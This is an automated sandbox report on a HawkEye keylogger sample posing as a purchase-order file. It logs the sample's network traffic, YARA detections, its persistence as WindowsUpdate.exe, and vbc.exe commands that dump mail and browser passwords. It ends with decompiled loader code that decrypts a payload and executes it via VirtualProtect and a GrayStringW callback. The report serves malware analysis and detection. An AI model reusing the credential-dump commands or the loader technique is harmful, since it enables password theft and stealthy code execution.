                                                Jan 19, 2021 14:08:20.111741066 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:21.066859961 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:21.114937067 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:27.746773005 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:27.794595957 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:31.018626928 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:31.066662073 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:33.980485916 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:34.031049013 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:37.069364071 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:37.125648975 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:42.337563992 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:42.385427952 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:08:42.811871052 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:08:42.859744072 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:09:08.177627087 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:09:08.225469112 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:09:09.648237944 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:09:09.699141026 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:09:41.623981953 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:09:41.674923897 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:09:59.172621965 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:09:59.220423937 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:09:59.894496918 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:09:59.951042891 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:03.218694925 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:03.275172949 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:03.438195944 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:03.494326115 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:04.525226116 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:04.587599993 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:05.257047892 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:05.313369989 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:05.526376009 CET | 61946 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:05.585340977 CET | 53 | 61946 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:06.657068968 CET | 64910 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:06.705086946 CET | 53 | 64910 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:07.892919064 CET | 52123 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:07.952100992 CET | 53 | 52123 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:09.728214979 CET | 56130 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:10.763556004 CET | 56130 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:11.809860945 CET | 56130 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:11.873954058 CET | 53 | 56130 | 8.8.8.8 | 192.168.2.3
                                                Jan 19, 2021 14:10:13.257555962 CET | 56338 | 53 | 192.168.2.3 | 8.8.8.8
                                                Jan 19, 2021 14:10:13.315814018 CET | 53 | 56338 | 8.8.8.8 | 192.168.2.3

                                                DNS Queries

                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                Jan 19, 2021 14:07:24.737133026 CET | 192.168.2.3 | 8.8.8.8 | 0x8b8d | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)

                                                DNS Answers

                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Jan 19, 2021 14:07:24.784964085 CET | 8.8.8.8 | 192.168.2.3 | 0x8b8d | No error (0) | whatismyipaddress.com | | 104.16.155.36 | A (IP address) | IN (0x0001)
                                                Jan 19, 2021 14:07:24.784964085 CET | 8.8.8.8 | 192.168.2.3 | 0x8b8d | No error (0) | whatismyipaddress.com | | 104.16.154.36 | A (IP address) | IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • whatismyipaddress.com

                                                HTTP Packets

                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.3 | 49709 | 104.16.155.36 | 80 | C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Jan 19, 2021 14:07:24.844419956 CET | 0 | OUT | GET / HTTP/1.1
                                                Host: whatismyipaddress.com
                                                Connection: Keep-Alive
                                                Jan 19, 2021 14:07:24.893872976 CET | 1 | IN | HTTP/1.1 403 Forbidden
                                                Date: Tue, 19 Jan 2021 13:07:24 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 16
                                                Connection: keep-alive
                                                X-Frame-Options: SAMEORIGIN
                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                Set-Cookie: __cfduid=dc5c380c1a5d92fcf9cb84a16088ebe551611061644; expires=Thu, 18-Feb-21 13:07:24 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure
                                                cf-request-id: 07bc5ae64d0000d711d12b6000000001
                                                Server: cloudflare
                                                CF-RAY: 6140c7507a92d711-FRA
                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                Data Ascii: error code: 1020


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Memory Usage

                                                High Level Behavior Distribution

                                                Behavior

                                                System Behavior

                                                General

                                                Start time:14:08:10
                                                Start date:19/01/2021
                                                Path:C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe'
                                                Imagebase:0xad0000
                                                File size:1074688 bytes
                                                MD5 hash:EB59D99961C7636B4872E389DA03CBC9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.316835361.000000001DCF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.317001771.000000001EEAE000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.317140638.000000001EFE2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.317057911.000000001EF40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.311897650.000000001C6F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.313417162.000000001CCF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:14:08:17
                                                Start date:19/01/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                Wow64 process (32bit):true
                                                Commandline:dw20.exe -x -s 2216
                                                Imagebase:0x7ff6741d0000
                                                File size:33936 bytes
                                                MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:14:08:20
                                                Start date:19/01/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                Imagebase:0x400000
                                                File size:1171592 bytes
                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                General

                                                Start time:14:08:20
                                                Start date:19/01/2021
                                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                Imagebase:0x400000
                                                File size:1171592 bytes
                                                MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                Reputation:high

                                                General

                                                Start time:14:08:22
                                                Start date:19/01/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 2244
                                                Imagebase:0xe50000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                General

                                                Start time:14:08:30
                                                Start date:19/01/2021
                                                Path:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
                                                Imagebase:0xed0000
                                                File size:1074688 bytes
                                                MD5 hash:EB59D99961C7636B4872E389DA03CBC9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.308445225.000000001EE00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.305904316.000000001C5F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.308219748.000000001DBD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.300925836.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000008.00000002.305233571.000000001AD92000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 37%, ReversingLabs
                                                Reputation:low

                                                General

                                                Start time:14:08:39
                                                Start date:19/01/2021
                                                Path:C:\Users\user\AppData\Roaming\WindowsUpdate.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\AppData\Roaming\WindowsUpdate.exe'
                                                Imagebase:0xed0000
                                                File size:1074688 bytes
                                                MD5 hash:EB59D99961C7636B4872E389DA03CBC9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.312787394.000000001EE40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.312583133.000000001DCB1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.301969493.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.312957269.000000001EED2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.309857450.000000001C5F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Disassembly

                                                Code Analysis

                                                  Executed Functions

                                                  C-Code - Quality: 58%
                                                  			E00B17B00(void* __eflags, long _a4, intOrPtr _a8, void* _a36, short _a44, char _a46, intOrPtr _a47, short _a51, _Unknown_base(*)() _a1036, char _a1044) {
                                                  				char _v12;
                                                  				intOrPtr _v20;
                                                  				char _v21;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				short _t40;
                                                  				char _t41;
                                                  				intOrPtr* _t51;
                                                  				intOrPtr* _t52;
                                                  				void* _t55;
                                                  				void* _t76;
                                                  				signed int _t81;
                                                  				signed int _t82;
                                                  				intOrPtr _t98;
                                                  				char _t101;
                                                  				void* _t102;
                                                  				long _t103;
                                                  				char _t106;
                                                  				long _t107;
                                                  				void* _t111;
                                                  				char* _t123;
                                                  				void* _t124;
                                                  				signed int _t128;
                                                  				void* _t129;
                                                  				void* _t131;
                                                  				void* _t132;
                                                  				void* _t133;
                                                  				void* _t136;
                                                  				char* _t138;
                                                  				void* _t139;
                                                  				void* _t140;
                                                  				void* _t141;
                                                  				void* _t142;
                                                  				signed int _t145;
                                                  				signed int _t146;
                                                  				void* _t147;
                                                  				void* _t148;
                                                  
                                                  				_t146 = _t145 & 0xfffffff8;
                                                  				E00B13710();
                                                  				_t40 =  *0xb23524; // 0x6465
                                                  				asm("movups xmm0, [0xb23514]");
                                                  				_a44 = _t40;
                                                  				_t41 =  *0xb23526; // 0x0
                                                  				_a46 = _t41;
                                                  				_t103 = 0;
                                                  				_a4 = 0;
                                                  				asm("movups [esp+0x2c], xmm0");
                                                  				_a47 = 0;
                                                  				_a51 = 0;
                                                  				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                  				E00B17E30();
                                                  				_a8 = L00B17EC0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xb616c5d9);
                                                  				_t51 = L00B17EC0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0xe0baa99);
                                                  				_t130 = _t51;
                                                  				_t52 = L00B17EC0(_t137, 0x9347c911);
                                                  				_t138 =  &_a1044;
                                                  				_t111 =  *_t51(0,  *_t52(0, L"IEUCIZEO", 0xa, _t129, _t136, _t102));
                                                  				if(_t111 == 0) {
                                                  					L3:
                                                  					_t55 = 0;
                                                  					do {
                                                  						asm("ror cl, 0x2");
                                                  						_t122 =  !(( ~( ~( *(_t146 + _t55 + 0x430)) ^ 0x000000de) ^ 0x000000d4) - _t55 + 0x0000006d ^ 0x000000fb) + _t55 - _t55;
                                                  						 *(_t146 + _t55 + 0x430) =  !(( ~( ~( *(_t146 + _t55 + 0x430)) ^ 0x000000de) ^ 0x000000d4) - _t55 + 0x0000006d ^ 0x000000fb) + _t55 - _t55;
                                                  						_t55 = _t55 + 1;
                                                  					} while (_t55 < 0x1805);
                                                  					VirtualProtect( &_a1036, 0x1805, 0x40,  &_a4);
                                                  					GrayStringW(GetDC(0), 0,  &_a1036,  &_a36, 0, 0, 0, 0, 0); // executed
                                                  					_push("cls");
                                                  					E00AE3965(_t103, 0x9347c911, _t130, _t138);
                                                  					_t147 = _t146 + 4;
                                                  					0xb27e6c->X = 0x4000a;
                                                  					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0xb27e6c->X);
                                                  					_t131 = 0x14;
                                                  					do {
